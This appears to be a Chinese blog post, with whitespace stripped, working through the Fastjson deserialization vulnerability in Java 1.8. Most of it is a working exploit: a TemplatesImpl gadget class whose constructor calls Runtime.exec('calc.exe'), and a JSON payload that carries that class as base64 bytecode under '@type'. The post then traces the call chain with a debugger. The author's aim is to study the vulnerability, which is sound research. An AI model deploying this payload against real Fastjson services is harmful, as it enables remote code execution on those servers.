java

这个漏洞一直只了解个大概,最近有空深入研究一下JAVA环境javaversion"1.8.0_211"Java(TM)SERuntimeEnvironment(build1.8.0_211-b12)JavaHotSpot(TM)64-BitServerVM(build25.211-b12,mixedmode)建立一个USER类publicclassUser{privateintage;publicStringusername;privateStringsecret;publicintgetAge(){returnage;}publicvoidsetAge(intage){this.age=age;}publicStringgetUsername(){returnusername;}publicvoidsetUsername(Stringusername){this.username=username;}publicStringgetSecret(){returnsecret;}@OverridepublicStringtoString(){returnthis.age+","+this.username+","+this.secret;}}函数作用JSON.toJSONString(Object)将对象序列化成json格式JSON.toJSONString(Object,SerializerFeature.WriteClassName)将对象序列化成json格式,并且记录了对象所属的类的信息JSON.parse(Json)将json格式返回为对象(但是反序列化类对象没有@Type时会报错)JSON.parseObject(Json)返回对象是com.alibaba.fastjson.JSONObject类JSON.parseObject(Json,Object.class)返回对象会根据json中的@Type来决定JSON.parseObject(Json,User.class,Feature.SupportNonPublicField);会把Json数据对应的类中的私有成员也给还原直接用网上的利用POCimportcom.sun.org.apache.xalan.internal.xsltc.DOM;importcom.sun.org.apache.xalan.internal.xsltc.TransletException;importcom.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;importcom.sun.org.apache.xml.internal.dtm.DTMAxisIterator;importcom.sun.org.apache.xml.internal.serializer.SerializationHandler;importjava.io.IOException;publicclasspocextendsAbstractTranslet{publicpoc()throwsIOException{Runtime.getRuntime().exec("calc.exe");}@Overridepublicvoidtransform(DOMdocument,DTMAxisIteratoriterator,SerializationHandlerhandler){}@Overridepublicvoidtransform(DOMdocument,com.sun.org.apache.xml.internal.serializer.SerializationHandler[]haFndlers)throwsTransletException{}publicstaticvoidmain(String[]args)throwsException{poct=newpoc();}}编译这个文件,将其内容进行base64编码,用fastjson把对象还原importjava.io.*;importjava.util.HashMap;importjava.util.Map;importcom.alibaba.fastjson.JSON;importcom.alibaba.fastjson.parser.Feature;importcom.alibaba.fastjson.parser.ParserConfig;importorg.apache.commons.io.IOUtils;importorg.apache.commons.codec.binary.Base64;publicclassVultest{publicstaticStringreadClass(Stringcls){ByteArrayOutputStreambos=newByteArrayOutputStream();try{IOUtils.copy(newFileInputStream(newFile(cls)),bos);}catch(IOExceptione){e.printStackTrace();}returnBase64.encodeBase64String(bos.toByteArray());}publicstaticvoidmain(String[]args)throwsUnsupportedEncodingException{ParserConfigconfig=newParserConfig();StringevilCode=readClass("D://code//fastjsonvul//target//classes//Poc.class");finalStringNASTY_CLASS="com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl";Stringtext1="{\"@type\":\""+NASTY_CLASS+"\",\"_bytecodes\":[\""+evilCode+"\"],'_name':'a.b','_tfactory':{},\"_outputProperties\":{},"+"\"_name\":\"a\",\"_version\":\"1.0\",\"allowedProtocols\":\"all\"}\n";Objectobj=JSON.parseObject(text1,Object.class,config,Feature.SupportNonPublicField);}}在excec下断点查看调用